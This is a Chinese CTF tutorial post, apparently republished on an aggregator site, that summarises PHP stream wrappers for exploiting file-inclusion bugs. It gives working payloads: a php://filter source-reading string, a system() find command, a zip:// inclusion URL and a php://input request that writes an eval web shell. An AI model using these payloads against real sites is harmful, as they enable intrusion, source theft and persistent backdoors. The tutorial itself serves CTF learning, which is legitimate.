CTF比赛中Web的php伪协议类型题小结

这篇具有很好参考价值的文章主要介绍了CTF比赛中Web的php伪协议类型题小结。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

php协议类型

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档

1.php伪协议:

需要开启allow_url_fopen的: php://input、php://stdin、php://memory和php://temp

不需要开启allow_wrl_fopen的: php://filter

在CTF中经常使用的是php://filter和php://input

php://filter用于读取源码   php://input用于执行php代码

php://input需要post请求提交数据

php://filter可以get提交?a=php://filter/read=convert.base64-encode/resource=xxx.php
convert.*过滤器
支持convert.iconv.* 格式,使用方法:

convert.iconv.<input-encoding>.<output-encoding>
 或
convert.iconv.<input-encoding>/<output-encoding> 

例如:

convert.iconv.UCS-4*.UCS-4BE   --->  将指定的文件从UCS-4*转换为UCS-4BE 输出
?filename=php://filter/convert.iconv.a.b/resource=check.php  (a,b 位置是编码格式)

2.data协议

php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码

使用方法:data://text/plain;base64,xxxx(base64编码后的数据)

data伪协议只有在php<5.3且include=on时可以写木马。

3.file协议

file://用于访问本地文件系统

用法: file://[文件的绝对路径和文件名]

#<?php system('find / -name flag*'); ?>

4.zip协议

封装伪协议命令如下:

?cmd=zip://D:\phpstudy\WWW\txt.zip%23zip.txt 

前面是zip文件 后面是zip中的文件

5.input写马

GET /include.php?cmd=php://input HTTP/1.1 (数据包头部)
请求体中增加一句马文章来源地址https://www.toymoban.com/news/detail-607117.html

<?php fwrite(fopen('exp.php','w'),'<?php eval($_POST[shell]);?>');?>

到了这里,关于CTF比赛中Web的php伪协议类型题小结的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [CTF/网络安全] 攻防世界 file_include 解题详析(php伪协议+convert转换过滤器)

    题目描述:怎么读取文件呢? 思路: 由代码审计可知,可通过filename参数构造POC,来读取check.php POC的构造涉及PHP伪协议,参考链接: 文件包含 | PHP伪协议实战 POC: 回显如下: 猜测被过滤,怎么办呢? 该题涉及到 convert转换过滤器 常见的convert转换过滤器有这两种:

    2024年02月07日
    浏览(67)
  • 搭建CTF比赛(训练)平台

    首先感谢开源作者: 本科毕设CTF平台-MarsCTF 演示视频:https://www.bilibili.com/video/BV1eA4y1o73C 项目下载地址:https://github.com/b1ackc4t/MarsCTF/releases 如果GitHub下载慢可以在这下载:https://download.csdn.net/download/ZXW_NUDT/87645797 我本人部署使用的是Kali Linux: 直接安装 docker-compose (1)确定

    2024年02月01日
    浏览(100)
  • 网络安全CTF比赛有哪些事?——《CTF那些事儿》告诉你

    目录 前言 一、内容简介 二、读者对象  三、专家推荐  四、全书目录   CTF比赛是快速提升网络安全实战技能的重要途径,已成为各个行业选拔网络安全人才的通用方法。但是,本书作者在从事CTF培训的过程中,发现存在几个突出的问题: 1)线下CTF比赛培训中存在严重的

    2024年02月08日
    浏览(48)
  • ctf比赛涉及的方面以及所需知识

    Reverse题目涉及到软件逆向、破解技术等,要求有较强的反汇编、反编译功底。主要考查参赛选手的逆向分析能力。所需知识:汇编语言、加密与解密、常见反编译工具 PwnPwn 在黑客俚语中代表着攻破,获取权限,在 CTF 比赛中它代表着溢出类的题目,其中常见类型溢出漏洞有

    2024年02月11日
    浏览(37)
  • web安全php基础_php数据类型

    PHP 支持以下几种数据类型: String(字符串) Integer(整型) Float(浮点型) Boolean(布尔型) Array(数组) Object(对象) NULL(空值) Resource(资源类型) PHP 字符串 一个字符串是一串字符的序列,就像 “Hello world!”。 可以将任何文本放在单引号和双引号中: 执行效果如下

    2024年02月12日
    浏览(55)
  • PHP 伪协议:使用 php://input 访问原始 POST 数据

    项目 描述 搜索引擎 Bing 、 Google AI 大模型 文心一言 、 通义千问 、 讯飞星火认知大模型 、 ChatGPT PHP 官方 ini.core.php PHP 官方 PHP Manual 项目 描述 PHP 5.5.0 、 5.6.8 、 7.0.0 、 7.2.5 、 7.4.9 、 8.0.0 、 8.2.9 PHP 编辑器 PhpStorm 2023.1.1(专业版) 概念 在 PHP 中, 伪协议(Pseudo Protocols)

    2024年02月03日
    浏览(36)
  • Volatility2安装使用以及CTF比赛题目(复现)

    Volatility是一款开源内存取证框架,能够对导出的内存镜像进行分析,通过获取内核数据结构,使用插件获取内存的详细情况以及系统的运行状态。 题目链接:链接: https://pan.baidu.com/s/1s9Ey8G12COT_vI65TwhIKw?pwd=shkd 提取码: shkd Volatility2.6需要python2,pip安装模块也需要2版本,具体命

    2024年02月06日
    浏览(56)
  • 网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...

       对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。 CTF在线工具 首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。 1、CTF在线工具箱:http://ctf.ssleye.com/    包含CTF比赛

    2023年04月24日
    浏览(87)
  • 2023年2月国内外CTF比赛时间汇总来了!

    从事网络安全行业工作,怎么能不参加一次CTF比赛了! 小编作为一个CTF比赛老鸟,以每次都能做出签到题为荣!图片 下面给大家分享一下2月份CTF比赛时间,比赛按时间先后排序,国内国外的都有哦! 文章末尾有ctf部落群 12月13日,在“首届全球数字贸易博览会·数字安全主

    2023年04月12日
    浏览(76)
  • 本地PHP搭建简单Imagewheel私人云图床,在外远程访问

    🔥 博客主页 : 小羊失眠啦 🔖 系列专栏 : C语言 、 Linux 🌥️ 每日语录 : 追逐影子的人,自己就是影子。 ❤️ 感谢大家点赞👍收藏⭐评论✍️ 前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站。 云存储在前几

    2024年02月08日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包